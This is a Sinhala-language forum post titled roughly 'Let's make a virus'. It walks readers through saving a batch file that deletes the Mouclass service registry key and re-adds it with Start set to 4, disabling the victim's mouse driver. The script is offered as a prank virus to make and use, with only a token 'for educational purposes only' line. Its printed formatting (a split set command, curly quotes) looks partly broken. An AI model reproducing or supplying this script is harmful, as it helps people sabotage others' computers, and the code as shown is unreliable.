Virus_එකක්_හදමු

sooppuwa

Well-known member
  • Jan 31, 2016
    782
    465
    63
    උඩ තට්ටුවෙ
    Mouse එකට කෙලවෙන්න Virus එකක් හදමු
    හරි එහෙනම් වැඩේ පටා…න් ගමු නේද.එහෙනම් වෙනදා වගේ Notepad එක Open කරගෙන වැඩේට ලෑස්ති වෙන්න්කෝ.
    computer-virus-protection-mouse-small-16556.jpg

    01.මුලින්ම Notepad එක Open කරගන්න දන්නැත්තම් මෙහෙම යන්න. Start-Allprogarm-Accessories-Notepad

    02.දැන් මං පහලින් දාලා තියෙන Code ටික Notepad එකට Copy/past කරන්න.

    03.දැන් Save as ගිහින් Mouse.bat කියල ගහලා Save කරගන්න.

    04.අන්තිමට .bat කියලා ගහන්න ඕනි.Mouse කියන තැනට ඕයාලා කැමති නමක් දාගෙන Save කරගන්න.

    මෙන්න කෝඩ් ටික

    rem ———————————
    rem Disable Mouse
    set
    key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    rem ———————————


    (මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි…)

    කුප්පියෙනි
     
    Last edited: